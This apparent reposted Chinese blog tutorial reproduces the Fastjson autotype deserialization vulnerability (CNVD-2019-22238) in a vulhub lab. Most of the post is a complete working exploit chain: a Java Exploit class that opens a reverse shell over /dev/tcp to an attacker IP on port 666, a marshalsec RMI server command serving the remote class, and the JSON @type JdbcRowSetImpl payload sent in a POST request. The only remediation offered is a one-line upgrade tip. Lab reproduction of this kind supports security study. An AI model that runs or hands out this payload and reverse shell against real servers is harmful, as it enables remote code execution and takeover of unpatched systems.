其他分享
首页 > 其他分享> > Fastjson反序列化漏洞复现(CNVD‐2019‐22238)

Fastjson反序列化漏洞复现(CNVD‐2019‐22238)

作者:互联网

一、漏洞描述

Fastjson 是一个开源JSON解析库。它提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会被远程执行任意代码。

二、影响范围

fastjson <= 1.2.47

三、环境准备

攻击机:192.168.208.131(windows)

目标机:192.168.208.129(Linux)

服务器:192.168.208.129(Linux)

由于资源有限,目标机和服务器共用一台设备

四、漏洞复现

漏洞环境:kali vulhub靶场

启动靶场环境

 

1、编写反弹shell的java文件Exploit.java,并使用“javac Exploit.java”命令编译为Exploit.class。将该class文件上传到服务器。

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
 
public class Exploit{
    public Exploit() throws Exception {
      Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/192.168.208.131/666;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
 
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }
 
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }
 
    public static void main(String[] args) throws Exception {
    }
}

2、服务器使用python命令“python3 -m http.server”开启http服务,使其目录下文件可以访问到。

 

 

 

3、使用marshalsec启动一个RMI服务器,监听一个自定义端口,这里监听9999,并制定加载远程类Exploit.class:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.208.129:8000/#Exploit" 9999

 

 4、攻击机开启监听666端口。

 

 5、访问靶场环境并抓包,将GET改为POST,插入payload。

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.208.129:9999/Exploit",
        "autoCommit":true
    }
}

 

 放包后即可看到已成功反弹shell。

 

 五、修复建议

升级到最新版本。

 

标签:Fastjson,java,22238,208.129,192.168,Exploit,序列化,class
来源: https://www.cnblogs.com/lwh01/p/16195310.html